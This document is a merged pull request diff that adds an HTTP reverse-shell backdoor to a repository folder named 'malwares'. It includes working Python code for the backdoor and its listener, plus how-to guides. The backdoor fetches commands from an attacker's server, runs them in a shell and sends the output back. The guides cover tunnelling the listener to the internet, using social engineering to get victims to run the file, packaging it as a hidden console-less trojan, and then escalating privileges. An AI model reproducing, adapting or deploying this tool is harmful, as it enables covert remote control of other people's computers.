Merge pull request #8 from dmdhrumilmistry/create_http_backdoor

create new backdoor

malwares/reverse_backdoor/HTTP/HowToUse.md

@@ -0,0 +1,55 @@
+# HTTP Reverse Shell/Backdoor
+
+- Opens a backdoor on executed device via HTTP protocol
+
+## Usage
+
+### Attack over LAN
+- Start listener
+    ```bash
+    python3 listener.py
+    ```
+    > Default port = 8080
+    > Change port in `listerner.py` on line 33 if another service is using 8080 port
+
+- Edit `IP` and `PORT` values in `backdoor.py` on line 48
+    ```python
+    IP = 'attacker_local_ip'
+    PORT = attacker_port  # 8080
+    ```
+
+### Attack over the internet
+
+- Start a ssh tunnel on attacker's device.
+    ```bash
+    ssh -R 80:localhost:<listener_port>
+    ```
+    > Note : Replace <listener_port> with port on which local server is running
+
+
+- Copy link that will be available after successfully tunelling between attacker's machine and localhost.run server.
+    ```
+    example : <random_characters>.localhost.run
+    ```
+
+- Start Listener on your localhost using
+    ```bash
+    python3 listener.py
+    ```
+
+- Replace copied link in `backdoor.py` on line 48.
+    ```python
+    IP = '<random_characters>.localhost.run'
+    ```
+
+- Use social engineering to make user to execute the python file or created standalone executable/trojan. Use python to run backdoor.py script.
+    ```
+    python3 backdoor.py
+    ```
+
+- Now use post exploitation tools to gain admin priviliges
+
+# Tested on 
+- Windows 10
+- Debian based OSes
+- Android Termux

malwares/reverse_backdoor/HTTP/backdoor.py

@@ -0,0 +1,49 @@
+import os
+from requests import get, post
+from subprocess import check_output
+
+class HTTPBackdoor:
+    def __init__(self, ip:str,  port:int=80, protocol:str='http', *kwargs) -> None:
+        self.url = f'{protocol}://{ip}:{port}'
+
+
+    def report(self, message:str):
+        post(url=self.url, data=message)
+
+
+    def exec_cmd(self, command):
+        try:
+            comm_res = check_output(command, shell=True).decode('utf-8')
+            self.report(comm_res)
+        except Exception as e:
+            self.report(f'Exception : {e}')
+
+
+    def cwd(self, path):
+        try:
+            os.chdir(path)
+            self.report(f'[*] Path changed to {path}')
+        except Exception as e:
+            self.report(f'[!] Cannot change path due to exception : {e}')
+
+
+    def connect(self):
+        running = True
+        while running:
+            command = get(self.url).text.strip()
+
+            if 'closeconn' in command:
+                self.report('[*] Connection closed')
+                running = False
+            elif 'cd' in command:
+                path = command.split(' ')[-1]
+                self.cwd(path)
+            else:
+                self.exec_cmd(command)
+
+
+if __name__ == '__main__':
+    IP = '<random_characters>.localhost.run'
+    PORT = 80
+    backdoor = HTTPBackdoor(IP, PORT)
+    backdoor.connect()

malwares/reverse_backdoor/HTTP/listener.py

@@ -0,0 +1,43 @@
+from sys import stderr
+from http.server import BaseHTTPRequestHandler, HTTPServer
+
+
+class HTTPListener(BaseHTTPRequestHandler):
+    # execute command
+    def do_GET(self):
+        command = input(f'{self.connection.getpeername()} >> ').strip().encode('utf-8')
+        self.send_response(200)
+        self.send_header(keyword="Content-type", value="text/html")
+        self.end_headers()
+        self.wfile.write(command)
+
+
+    # get result
+    def do_POST(self):
+        self.send_response(200)
+        self.end_headers()
+        read_length = int(self.headers['Content-Length'])
+        result = self.rfile.read(read_length)
+        print(result.decode('utf-8'))
+        return result
+
+
+    # supress logs
+    def log_message(self, format: str, *args) -> None:
+        return 
+
+
+if __name__ == '__main__':
+    try:
+        IP = '127.0.0.1'
+        PORT = 8080
+        server_add = (IP, PORT)
+        httpd = HTTPServer(server_add, HTTPListener)
+        print(f'[*] Listening on http://{IP}:{PORT}')
+        httpd.serve_forever()
+
+    except KeyboardInterrupt:
+        print('\n[!] ctrl+c detected!!')
+
+    except Exception as e:
+        print(f'\n[!] Exception : {e}')

malwares/reverse_backdoor/TCP/HowToUse.md

@@ -0,0 +1,32 @@
+
+## Change Values according to need
+- change ip and port to your desired values in listener.py and reverse_backdoor.py
+
+- run listener.py on attackers machine.
+
+- run backdoor.py on victims machine.
+
+## Create a executable\standalone
+- pip3 install pyinstaller
+
+- Creating executable with console: 
+    ```bash
+    $ pyinstaller python_file.py --onefile
+    ```
+
+- Creating executable without console: 
+    ```bash
+    $ pyinstaller python_file.py --onefile --noconsole
+    ```
+
+
+> note : noconsole works when we're not using stream like stdin, stdout, stderr, etc. 
+> If we're using STDI/O streams then we have to set then to DEVNULL = open(os.devnull, 'wb') then set IOstreams to DEVNULL
+> if using subprocess.check_output then use subprocess.check_output(command, stderr=subprocess.DEVNULL, stdin=subprocess.DEVNULL).
+> here stdio is being handled by check_output. so no need to handle stdio.
+
+## Create windows executable on linux
+- Install Wine 
+- Download Python for windows 
+- Install Downloaded python for windows using wine on linux 
+- the other commands remain the same to create executable.